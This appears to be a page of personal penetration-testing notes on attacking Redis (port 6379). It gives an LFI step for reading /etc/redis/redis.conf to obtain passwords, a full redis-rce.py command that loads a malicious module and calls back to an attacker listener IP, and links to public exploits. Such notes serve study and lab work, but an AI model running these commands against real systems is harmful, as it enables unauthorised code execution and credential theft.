Obsidian-Html/Notes

T

Toggle Directory Tree Pane

Toggle Table of Contents Pane

x

Attacking AWS Cloud Infra

Enumerating AWS Cloud Infra

Android

Possibly Relevant Exploits

Hands-On Credential Phishing

index

Redis (6379)

Check on LFI where redis is visible on nmap

/etc/redis/redis.conf

Redis passwords are stored in the redis.conf file. Make sure to check for it with remote access or with LFI.

/etc/redis/redis.conf

Redis-RCE

python3 redis-rce.py -r 192.168.210.166 -p 6379 -L 192.168.45.225 -P 9003 -v -a "Ready4Redis?" -f exp.so

Check for info when connected

info

Resources

https://hackviser.com/tactics/pentesting/services/redis
https://secybr.com/posts/redis-pentesting-best-practices/
https://book.hacktricks.wiki/en/network-services-pentesting/6379-pentesting-redis.html#redis-authentication

Exploits

https://www.exploit-db.com/exploits/47195
https://github.com/n0b0dyCN/RedisModules-ExecuteCommand

Left-click: follow link, Right-click: select node, Scroll: zoom

x